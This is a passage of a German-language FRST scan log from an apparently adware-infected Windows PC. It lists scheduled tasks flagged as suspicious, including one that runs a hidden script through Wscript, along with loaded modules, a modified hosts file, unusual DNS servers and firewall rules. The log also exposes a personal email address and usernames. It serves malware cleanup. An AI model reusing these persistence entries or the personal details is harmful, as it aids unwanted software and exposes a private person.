Task: {B7684489-7DC8-4696-872C-933919F9773C} - System32\Tasks\Puudghpe => C:\PROGRA~1\SHOPPE~1\Vinfe.bat <==== ACHTUNG
Task: {C1B41D22-D919-4AF3-847A-76AFF73B31CB} - System32\Tasks\vreXjvXBrowserUpdateCore => C:\Program Files (x86)\vreXjvX\vreXjvX\bin\vreXjvX_server.exe <==== ACHTUNG
Task: {C1D5DB7C-8ABC-4090-AA36-E3273BB4E184} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
Task: {C9AC3528-B9EB-4717-BFC6-AB04D11F4027} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-06-02] (Lenovo)
Task: {C9C297E7-DD8B-4FA2-8794-B6A5A1BD8E2F} - System32\Tasks\SHKKPQC1 => C:\ProgramData\SecurityUtility\SecurityUtility.exe <==== ACHTUNG
Task: {CEEC71C2-B6A1-4F01-BDE1-940909C94B23} - System32\Tasks\{DD80174A-544A-4722-8E27-91F6BAF70702} => pcalua.exe -a "C:\Program Files (x86)\MPC Cleaner\Uninstall.exe"
Task: {D3B9A83E-16D2-494D-B413-4218EAF0EA46} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-hempel-lukas@gmx.de => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe
Task: {D3F81535-8FDA-4B35-BFB7-6CC878339F80} - System32\Tasks\DistromaticSearchProtect-logon => C:\Program Files (x86)\Amazon Browser Settings\AmznSearchProtect.exe <==== ACHTUNG
Task: {D42AF600-22CF-4DD6-9310-7166836CC22E} - System32\Tasks\Lenovo\SHUpdate => C:\Program Files (x86)\Lenovo\SHAREit\ShareitUpdater.exe
Task: {DC8E776B-2B16-4098-B01A-0365132F6014} - System32\Tasks\WebBarLaunchTask => C:\Program Files\WebBar\wbsvc.exe <==== ACHTUNG
Task: {DDCA05E2-D7A6-4D6A-A116-69A10466500B} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-06-02] ()
Task: {E6BF0D92-4B86-4441-9986-D027C109336A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {E99ED54D-F1F5-4353-AC74-C2FF79083CEC} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: {F3B90C49-4800-4CE1-8F41-C045510B9049} - System32\Tasks\SMW_UpdateTask_Time_3935333434393031302d235b783432415b45345a2d6c => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ACHTUNG
Task: {F49E9DF3-F840-43E9-9A9C-860F0CF04EF2} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ACHTUNG
Task: {F7ECDCE0-EEE7-48DB-9B8C-7865428EBA45} - System32\Tasks\Instagram Downloader => C:\Users\Hempe\AppData\Local\Temp\is-4VR1G.tmp\prsetup.exe <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\SHKKPQC1.job => C:\ProgramData\SecurityUtility\SecurityUtility.exe <==== ACHTUNG
Task: C:\WINDOWS\Tasks\System HealerPeriod.job =>  <==== ACHTUNG
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ACHTUNG
Task: C:\WINDOWS\Tasks\{742B83EF-B0CA-C187-A1E5-004F32763E89}.job => C:\Users\Hempe\AppData\Local\{48D27~1\UNINST~1.EXE <==== ACHTUNG

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-12-10 19:27 - 2011-08-16 20:46 - 00032768 _____ () C:\Windows\jmesoft\Service.exe
2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-10-19 14:03 - 2016-10-19 14:03 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-10-19 13:08 - 2016-08-01 13:54 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-10-19 14:03 - 2016-10-19 14:03 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-10-19 14:03 - 2016-10-19 14:03 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-05-22 18:33 - 2016-05-22 18:33 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2016-05-06 13:05 - 2015-02-27 13:38 - 00721263 _____ () C:\WINDOWS\SysWOW64\WSCM64.dll
2016-10-19 14:03 - 2016-10-19 14:03 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-10-19 14:03 - 2016-10-19 14:03 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-10-28 14:18 - 2016-10-15 04:41 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-10-28 14:18 - 2016-10-15 04:34 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-10-28 14:18 - 2016-10-15 04:34 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-10-28 14:18 - 2016-10-15 04:34 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-10-28 14:18 - 2016-10-15 04:34 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-10-28 14:18 - 2016-10-15 04:38 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-12-10 19:27 - 2011-08-16 20:46 - 00024576 _____ () C:\Windows\jmesoft\JME_LOAD.exe
2016-11-04 13:02 - 2016-11-04 13:02 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.9.251.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-11-04 13:02 - 2016-11-04 13:02 - 00178688 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.9.251.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-11-04 13:02 - 2016-11-04 13:02 - 41608704 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.9.251.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2016-04-27 15:08 - 2016-05-23 03:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
2016-06-15 22:52 - 2016-06-08 14:41 - 00114664 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\zlib1.dll
2016-06-15 22:52 - 2016-06-08 14:39 - 00108008 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_filesystem-vc120-mt-1_56.dll
2016-06-15 22:52 - 2016-06-08 14:39 - 00024040 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_system-vc120-mt-1_56.dll
2016-06-15 22:52 - 2016-06-08 14:39 - 00048104 _____ () C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\boost_date_time-vc120-mt-1_56.dll
2015-07-10 23:37 - 2015-07-10 23:37 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2016-04-27 15:08 - 2016-05-23 03:37 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll
2016-05-05 20:31 - 2014-09-11 17:09 - 01498112 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
2016-05-05 20:31 - 2014-05-19 16:19 - 00137728 _____ () C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
2015-12-10 19:27 - 2011-05-17 13:27 - 00028672 _____ () C:\Windows\jmesoft\hidhook.dll
2016-07-21 14:42 - 2016-10-10 19:19 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-10-28 11:57 - 2016-10-10 19:19 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-10-28 11:57 - 2016-10-10 19:19 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-10-28 11:57 - 2016-10-10 19:19 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-07-21 14:42 - 2016-10-10 19:19 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-07-21 14:42 - 2016-10-10 19:19 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-07-21 14:42 - 2016-10-24 14:16 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-07-21 14:42 - 2016-10-10 19:19 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-07-21 14:42 - 2016-10-10 19:20 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 01682760 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-08-06 20:07 - 2016-10-24 14:16 - 00021312 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-10-28 11:57 - 2016-10-10 19:19 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-10-28 11:57 - 2016-10-10 19:21 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-07-21 14:42 - 2016-10-24 14:16 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-08-06 20:07 - 2016-10-24 14:16 - 00025424 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 00246592 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-08-06 20:07 - 2016-10-10 19:20 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-07-21 14:42 - 2016-10-24 14:16 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-07-21 14:42 - 2016-10-24 14:16 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-07-21 14:42 - 2016-10-24 14:16 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2016-07-21 14:42 - 2016-10-24 14:16 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2016-07-21 14:42 - 2016-10-10 19:21 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-07-21 14:42 - 2016-10-24 14:16 - 00022352 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-10-28 11:57 - 2016-10-10 19:17 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-10-28 11:57 - 2016-10-24 14:15 - 00031568 _____ () C:\Program Files (x86)\Dropbox\Client\enterprise_data.compiled._enterprise_data.pyd
2016-10-28 11:57 - 2016-10-24 14:06 - 00293392 _____ () C:\Program Files (x86)\Dropbox\Client\EnterpriseDataAdapter.dll
2016-10-28 11:57 - 2016-10-24 14:15 - 00084280 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-10-28 11:57 - 2016-10-24 14:15 - 01826096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-07-21 14:42 - 2016-10-10 19:19 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-10-28 11:57 - 2016-10-24 14:16 - 00531248 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-10-28 11:57 - 2016-10-24 14:16 - 03928880 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-10-28 11:57 - 2016-10-24 14:15 - 01972528 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-10-28 11:57 - 2016-10-24 14:16 - 00133424 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-10-28 11:57 - 2016-10-24 14:16 - 00224056 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-10-28 11:57 - 2016-10-24 14:16 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-08-06 20:07 - 2016-10-24 14:16 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2016-10-28 11:57 - 2016-10-10 19:24 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-10-28 11:57 - 2016-10-10 19:24 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2016-07-21 14:42 - 2016-10-10 19:21 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2016-07-21 14:42 - 2016-10-24 14:16 - 00037192 _____ () C:\Program Files (x86)\Dropbox\Client\windisplaytoast.compiled._DisplayToast.pyd
2016-08-06 20:07 - 2016-10-24 14:16 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-10-21 23:23 - 2016-10-20 09:47 - 01819240 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.71\libglesv2.dll
2016-10-21 23:23 - 2016-10-20 09:47 - 00093288 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.71\libegl.dll
2016-04-05 16:57 - 2016-04-05 16:57 - 00393608 _____ () C:\Users\Administrator\AppData\Roaming\Curse Client\Bin\opus.dll
2016-09-30 01:26 - 2016-11-02 19:38 - 00534408 _____ () C:\Users\Administrator\AppData\Roaming\Curse Client\Bin\Curse.Presto.Interface.dll
2016-05-02 22:26 - 2016-05-02 22:26 - 01690504 _____ () C:\Users\Administrator\AppData\Roaming\Curse Client\Bin\Electron\libglesv2.dll
2016-05-02 22:26 - 2016-05-02 22:26 - 00018312 _____ () C:\Users\Administrator\AppData\Roaming\Curse Client\Bin\Electron\libegl.dll
2016-11-08 14:15 - 2016-11-08 14:15 - 00679624 _____ () C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\ClientTelemetry.dll
2016-11-08 14:22 - 2016-09-08 04:14 - 00784672 _____ () D:\Steam\SDL2.dll
2016-11-08 14:22 - 2016-09-01 02:02 - 04969248 _____ () D:\Steam\v8.dll
2016-11-08 14:22 - 2016-10-13 02:58 - 02321696 _____ () D:\Steam\video.dll
2016-11-08 14:22 - 2016-01-27 08:49 - 02549760 _____ () D:\Steam\libavcodec-56.dll
2016-11-08 14:22 - 2016-01-27 08:49 - 00491008 _____ () D:\Steam\libavformat-56.dll
2016-11-08 14:22 - 2016-01-27 08:49 - 00332800 _____ () D:\Steam\libavresample-2.dll
2016-11-08 14:22 - 2016-01-27 08:49 - 00442880 _____ () D:\Steam\libavutil-54.dll
2016-11-08 14:22 - 2016-01-27 08:49 - 00485888 _____ () D:\Steam\libswscale-3.dll
2016-11-08 14:22 - 2016-09-01 02:02 - 01563936 _____ () D:\Steam\icui18n.dll
2016-11-08 14:22 - 2016-09-01 02:02 - 01195296 _____ () D:\Steam\icuuc.dll
2016-11-08 14:22 - 2016-10-13 02:58 - 00836896 _____ () D:\Steam\bin\chromehtml.DLL
2016-11-08 14:22 - 2016-07-04 23:17 - 00266560 _____ () D:\Steam\openvr_api.dll
2016-11-08 14:22 - 2016-08-04 21:56 - 49825056 _____ () D:\Steam\bin\cef\cef.winxp\libcef.dll
2016-11-08 14:22 - 2015-09-25 00:52 - 00119208 _____ () D:\Steam\winh264.dll
2016-10-25 20:52 - 2016-10-24 10:03 - 17771200 _____ () C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\PepperFlash\23.0.0.205\pepflashplayer.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\S-1-5-21-281671067-3093265053-1301455503-500\...\amazon.de -> hxxps://amazon.de

==================== Hosts Inhalt: ==========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-07-10 12:04 - 2016-11-04 12:59 - 00001147 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
0.0.0.1	mssplus.mcafee.com

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-281671067-3093265053-1301455503-500\Control Panel\Desktop\\Wallpaper -> C:\Users\Administrator\Pictures\14721737_1240651549307156_54240343007281989_n.jpg
DNS Servers: 82.163.143.171 - 82.163.142.173
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

HKLM\...\StartupApproved\Run32: => "CLMLServer"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKLM\...\StartupApproved\Run32: => "Avira SystrayStartTrigger"
HKLM\...\StartupApproved\Run32: => "Avira System Speedup User Starter"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{AE4E93AA-888C-4550-91C4-6540243C2491}] => (Allow) D:\Steam Games\steamapps\common\Rust\Rust.exe
FirewallRules: [{F5E9F3A6-AE26-4A0F-B9BF-977CA33AD70F}] => (Allow) D:\Steam Games\steamapps\common\Rust\Rust.exe
FirewallRules: [{4E8F8267-57A6-4021-82CA-B8E6A1BDFF81}] => (Allow) D:\RedAlert1_Online\cncnet5.exe
FirewallRules: [{E1D50285-C1CF-4252-A944-5275902BC99B}] => (Allow) D:\RedAlert1_Online\cncnet5.exe
FirewallRules: [{CF462B45-6A55-48DD-97EF-B527692FF053}] => (Allow) D:\RedAlert1_Online\ra95-spawn.exe
FirewallRules: [{20125097-3E05-4C40-8209-D4F858C5D5D9}] => (Allow) D:\RedAlert1_Online\ra95-spawn.exe
FirewallRules: [{C9BA51ED-9844-4752-8F61-8BB0DDEB892E}] => (Allow) D:\RedAlert1_Online\cncnet5.exe
FirewallRules: [{A5FCA25A-E9E9-4CD0-B8B8-9A54562D0F3D}] => (Allow) D:\RedAlert1_Online\cncnet5.exe
FirewallRules: [{591E9567-5ACB-45EE-A00F-8CE2573A657C}] => (Allow) D:\RedAlert1_Online\cncnet5.exe
FirewallRules: [{6221A48D-CCE6-40F6-8551-02E24A1D51AB}] => (Allow) D:\RedAlert1_Online\cncnet5.exe
FirewallRules: [{E1157D09-BAE4-4F4B-98AF-1CEB03073ED6}] => (Allow) D:\RedAlert1_Online\cncnet5.exe
FirewallRules: [{F538A29B-DB95-49E5-AFAB-667BAFE7054C}] => (Allow) D:\RedAlert1_Online\cncnet5.exe
FirewallRules: [{EC63F85F-FB7D-4879-B056-187F4D0CEF91}] => (Allow) D:\Steam Games\steamapps\common\Age2HD\Launcher.exe
FirewallRules: [{4B4104F6-0DD3-4F59-8723-9C3B8BF167F9}] => (Allow) D:\Steam Games\steamapps\common\Age2HD\Launcher.exe
FirewallRules: [{63AF7870-1B7D-4F61-A6DF-E02CF8EBB28B}] => (Allow) D:\Steam Games\steamapps\common\Istrolid\istrolid.exe
FirewallRules: [{2FFA2C87-E9D9-438E-8382-71A7699C3692}] => (Allow) D:\Steam Games\steamapps\common\Istrolid\istrolid.exe
FirewallRules: [{0A15CB51-9321-4B5B-BB6C-E372ABED0AF5}] => (Allow) C:\ProgramData\vreXjvX\protect\protect.exe
FirewallRules: [{FFAA4BF4-3844-4562-A13B-9E8603B5EBD0}] => (Allow) D:\Steam Games\steamapps\common\ShellShock Live\ShellShockLive.exe
FirewallRules: [{A0439367-08D1-48F8-941C-7C603C40EDDA}] => (Allow) D:\Steam Games\steamapps\common\ShellShock Live\ShellShockLive.exe
FirewallRules: [UDP Query User{834D8DD7-6FC8-4460-AD6A-020510A59E19}D:\steam games\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\steam games\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [TCP Query User{95055BC2-1009-4BFA-A16C-D0805D56ABE2}D:\steam games\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\steam games\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [{607AB997-7AD6-48B4-9D13-67C71CAC9D3E}] => (Allow) C:\Riot Games\League of Legends\lol.launcher.exe
FirewallRules: [{2C08A767-35B5-4054-A73D-FB838CF759F4}] => (Allow) C:\Riot Games\League of Legends\lol.launcher.exe
FirewallRules: [{69505A8A-FC8B-47AF-814C-04E002331848}] => (Allow) C:\Riot Games\League of Legends\lol.launcher.exe
FirewallRules: [{16125972-80AE-41A6-BAA6-544EEAAC27E3}] => (Allow) C:\Riot Games\League of Legends\lol.launcher.exe
FirewallRules: [{8CCF5363-0D1E-4BD5-BE2A-0F5FD6CE368D}] => (Allow) D:\Steam Games\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{6E40B6EC-98C9-421F-A289-2BA258437BBD}] => (Allow) D:\Steam Games\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe
FirewallRules: [{4A0C0BF1-FE75-4828-B040-6C008C72F6DF}] => (Allow) D:\Steam Games\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{0F333D5B-483C-41FE-AB3D-A3B8D1CA5B39}] => (Allow) D:\Steam Games\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{9F50F1E3-5211-4F9A-B1DF-24A88E321060}] => (Allow) D:\bin\steamwebhelper.exe
FirewallRules: [{FB9F4330-C886-4628-8164-ECFD2E21C46C}] => (Allow) D:\bin\steamwebhelper.exe
FirewallRules: [{1B19EFBC-5256-4E89-98A7-F505AF698AC2}] => (Allow) D:\Steam.exe
FirewallRules: [{701F7974-0B2F-4F76-9536-D9CD12435F1F}] => (Allow) D:\Steam.exe
FirewallRules: [{0B2861D9-1197-4961-99A0-D6700B04FCFF}] => (Allow) C:\Users\Hempe\Desktop\bin\steamwebhelper.exe
FirewallRules: [{6FAFBCF5-34D6-4E0D-ADE5-E8C8E2A6AD2A}] => (Allow) C:\Users\Hempe\Desktop\bin\steamwebhelper.exe
FirewallRules: [{F96BEEAD-4679-4CC8-8A8F-80323B6E6435}] => (Allow) C:\Users\Hempe\Desktop\Steam.exe
FirewallRules: [{FB617A99-21BF-4773-A971-1E2B9A11B150}] => (Allow) C:\Users\Hempe\Desktop\Steam.exe
FirewallRules: [{6762F221-4ECC-4A21-A59D-E9341A9BF351}] => (Allow) D:\Steam\steamapps\common\EvolveGame\bin64_SteamRetail\Evolve.exe
FirewallRules: [{0858D6F3-0FF9-4798-B08A-0979A3F7A399}] => (Allow) D:\Steam\steamapps\common\EvolveGame\bin64_SteamRetail\Evolve.exe
FirewallRules: [{3C415605-D817-4131-983D-C8965E1F13A8}] => (Allow) D:\Steam\steamapps\common\H1Z1 Test\LaunchPad.exe
FirewallRules: [{9961BED6-084B-4F8B-993E-949E612D7105}] => (Allow) D:\Steam\steamapps\common\H1Z1 Test\LaunchPad.exe
FirewallRules: [{E3B2E6E6-9FB0-4E5E-8840-53BF9E57892D}] => (Allow) D:\Steam\steamapps\common\H1Z1\LaunchPad.exe
FirewallRules: [{AAD2C2DD-139F-4E22-8317-4A9D6466A446}] => (Allow) D:\Steam\steamapps\common\H1Z1\LaunchPad.exe
FirewallRules: [{C5B11B73-EAC9-4083-AF08-3A11A2BD88FF}] => (Allow) D:\Steam\steamapps\common\ARK SOTF\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{A614D200-493E-4D47-8480-4410411A68C6}] => (Allow) D:\Steam\steamapps\common\ARK SOTF\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{23E99CBC-A082-465D-99FE-B4F75A93E407}] => (Allow) D:\Steam\steamapps\common\Dragomon Hunter\Game.bin
FirewallRules: [{B86E7797-EBAD-499C-8420-035E8DE322DF}] => (Allow) D:\Steam\steamapps\common\Dragomon Hunter\Game.bin
